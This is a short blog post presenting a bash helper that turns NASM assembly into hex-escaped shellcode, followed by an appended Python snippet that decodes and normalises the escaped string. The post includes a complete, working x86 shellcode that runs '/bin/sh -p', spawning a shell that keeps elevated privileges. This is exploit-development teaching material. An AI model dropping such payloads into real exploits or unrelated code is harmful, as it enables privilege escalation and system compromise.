Thursday, December 22, 2011

Shellify: helper script for shellcoders

Shellify is a small bash script designed to help with writing shellcode. All it does is assemble your asm file with nasm and then convert the result to a hexadecimal representation.

You probably already own such a tool, and if you don't, then you should!

Download: shellify.sh

Here is an example with a simple sys_execve "/bin/sh -p":

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$ cat execve_param.s
xor edx, edx        ;; edx == 0
xor eax, eax        ;; eax == 0

push edx            ;; NULL
push word 0x702d    ;; p-
mov ecx, esp

push edx            ;; NULL
push 0x68732f2f     ;; hs//
push 0x6e69622f     ;; nib/
mov ebx, esp

push edx            ;; NULL
push ecx            ;; "-p"
push ebx            ;; "/bin/sh"
mov ecx, esp

mov al, 0xb
int 0x80            ;; execve

$ ./shellify.sh
usage ./shellify.sh <file.s>

$ ./shellify.sh execve_param.s
***Compiling...
length: 33
shellcode: \x31\xd2\x31\xc0\x52\x66\x68\x2d\x70\x89\xe1\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xb0\xb\xcd\x80
***Test (or not!) your shellcode : ./execve_param

$ ./execve_param
sh-4.1$ exit
exit
posted by po.
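
The `shellcode:` line in the session above writes the byte 0x0b as `\xb`, with a single hex digit; a C compiler accepts that inside a string literal, while stricter parsers (Python's own `\x` escape, for one) require two digits. The Python below is an added example, not part of the original post or of shellify.sh: it decodes the printed string tolerantly, lets you compare the byte count with the reported length, and re-emits the string zero-padded. All function and constant names are hypothetical.

```python
import re

# One \x escape with one or two hex digits. A C compiler accepts the
# one-digit form when the next character is not a hex digit.
ESCAPE = re.compile(r"\\x([0-9a-fA-F]{1,2})")

# The "shellcode:" line from the session above, copied verbatim.
SAMPLE = (r"\x31\xd2\x31\xc0\x52\x66\x68\x2d\x70\x89\xe1\x52\x68\x2f\x2f"
          r"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xb0"
          r"\xb\xcd\x80")
REPORTED_LENGTH = 33  # the "length:" line from the same session


def _escapes(text):
    """Yield each escape's hex digits; reject anything that is not an escape."""
    pos = 0
    for m in ESCAPE.finditer(text):
        if m.start() != pos:
            raise ValueError(f"unexpected text at offset {pos}")
        pos = m.end()
        yield m.group(1)
    if pos != len(text):
        raise ValueError(f"unexpected text at offset {pos}")


def decode_escaped(text):
    """Decode a run of \\xN / \\xNN escapes into bytes."""
    return bytes(int(digits, 16) for digits in _escapes(text))


def unpadded_offsets(text):
    """Byte offsets whose escape was written with a single hex digit."""
    return [i for i, digits in enumerate(_escapes(text)) if len(digits) == 1]


def normalize(text):
    """Re-emit the same bytes with every escape zero-padded to two digits."""
    return "".join(f"\\x{b:02x}" for b in decode_escaped(text))


if __name__ == "__main__":
    data = decode_escaped(SAMPLE)
    print("decoded length:", len(data), "reported:", REPORTED_LENGTH)
    print("unpadded escapes at byte offsets:", unpadded_offsets(SAMPLE))
    print("normalized:", normalize(SAMPLE))
```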